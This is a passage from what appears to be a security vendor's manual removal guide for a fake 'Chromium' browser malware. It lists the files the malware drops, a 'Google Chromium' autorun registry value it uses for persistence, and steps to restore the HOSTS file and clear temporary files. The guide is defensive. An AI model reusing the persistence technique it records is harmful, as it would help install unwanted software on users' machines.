   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\pt-BR.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ca.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sr.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\te.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\bg.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ja.pak (1274 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sv.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\lt.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\chrome_100_percent.pak (6625 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\en-GB.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\kn.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\uk.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\en-US.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ta.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\vi.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\mr.pak (2282 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\zh-CN.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ar.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\zh-CN.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\de.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\mr.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\zh-TW.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\et.pak (2249 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ms.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\nb.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\he.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\de.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sk.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\th.pak (2282 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ko.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\zh-TW.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\pt-BR.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\chrome.dll (794832 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\pt-PT.dll (10 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fil.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\resources.pak (40311 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\hr.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\pl.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\es.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ml.pak (4074 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\hi.pak (2282 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\el.pak (3461 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fi.pak (762 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\bn.dll (9 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\te.pak (3257 bytes)
   %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\hi.dll (10 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\RarSFX0\installer.exe (38174 bytes)

4. Delete the following value(s) in the autorun key (How to Work with System Registry):
   

   [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
   "Google Chromium" = "%Documents and Settings%\%current user%\Application Data\Chromium.exe"

5. Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
   127.0.0.1 localhost
   
6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.